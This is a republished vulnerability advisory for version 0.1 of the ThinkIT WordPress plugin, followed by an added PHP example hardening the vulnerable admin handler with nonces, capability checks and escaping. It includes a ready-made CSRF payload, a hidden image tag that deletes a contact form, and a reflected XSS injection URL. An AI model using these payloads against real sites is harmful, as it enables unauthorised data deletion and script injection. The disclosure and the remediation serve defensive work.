Source: zixuephp.com (自学PHP网)  Date: 2015-04-17 10:15
###########################################################
# Title: Wordpress ThinkIT plugin - CSRF / XSS
# Discovered by: Yashar shahinzadeh
# Vendor site: http://thinkoverit.com/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected version: 0.1
###########################################################

Summary
========
1. CSRF - Delete a form
2. Cross site scripting

1. CSRF - Delete a form:
========================
The contact form ID can be read directly from the HTML page source, in the hidden field
<input type="hidden" value="[ID]" name="toit-form-id" />, where [ID] is the form ID.
The following crafted request can then be used to delete the form completely:

<img src="http://[WP]/wp-admin/admin.php?toitcf_current_id=[ID]&action=delete&page=toitcf" width="1" height="1">

Obviously, [ID] must be replaced with the real form ID.

2. Cross site scripting:
========================
http://[WP]/wordpress/wp-admin/admin.php?toitcf_current_id=[XSS]&page=toitcf

/** Yashar shahinzadeh **/
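Both issues come from the same admin handler trusting the `toitcf_current_id` and `action` parameters without a nonce, a capability check, or output escaping. The following is an added example, not the plugin's own code, of how such a WordPress admin handler can be hardened; the `toitcf_delete_link`, `toitcf_handle_request` and `toitcf_delete_form` names are assumptions for illustration, while the nonce, escaping and capability functions are the standard WordPress API.

```php
<?php
// Added example (not the ThinkIT plugin's code): hardening an admin handler for
// admin.php?page=toitcf&action=delete&toitcf_current_id=[ID] against the
// CSRF and XSS issues described in the advisory above.

// Building the delete link in the form list. wp_nonce_url() appends a per-user,
// per-action token, which a forged <img src="..."> request cannot supply.
function toitcf_delete_link( $form_id ) {          // assumed name
    $form_id = absint( $form_id );
    $url = add_query_arg( array(
        'page'              => 'toitcf',
        'action'            => 'delete',
        'toitcf_current_id' => $form_id,
    ), admin_url( 'admin.php' ) );
    return wp_nonce_url( $url, 'toitcf_delete_' . $form_id );
}

// Handling the request on the admin page.
function toitcf_handle_request() {                 // assumed name
    // Authorization: only users allowed to manage the site may delete forms.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // Input validation: coerce the ID to a non-negative integer (anything that
    // is not a number, including script markup, becomes 0) and restrict the
    // action to a safe key.
    $form_id = isset( $_GET['toitcf_current_id'] ) ? absint( $_GET['toitcf_current_id'] ) : 0;
    $action  = isset( $_GET['action'] ) ? sanitize_key( $_GET['action'] ) : '';

    if ( 'delete' === $action && $form_id > 0 ) {
        // CSRF fix: check_admin_referer() dies unless the request carries a
        // valid nonce for this specific form, so a cross-site request fails here.
        check_admin_referer( 'toitcf_delete_' . $form_id );
        toitcf_delete_form( $form_id );            // assumed storage helper
    }

    // XSS fix: never echo request data raw. The ID is already an integer, and
    // esc_attr() escapes it for the HTML attribute context regardless.
    echo '<input type="hidden" name="toit-form-id" value="' . esc_attr( $form_id ) . '" />';
}
```

Nonce checks complement, but do not replace, the capability check: the nonce proves the request was issued from a page this user loaded, while `current_user_can()` proves the user is allowed to perform the action at all.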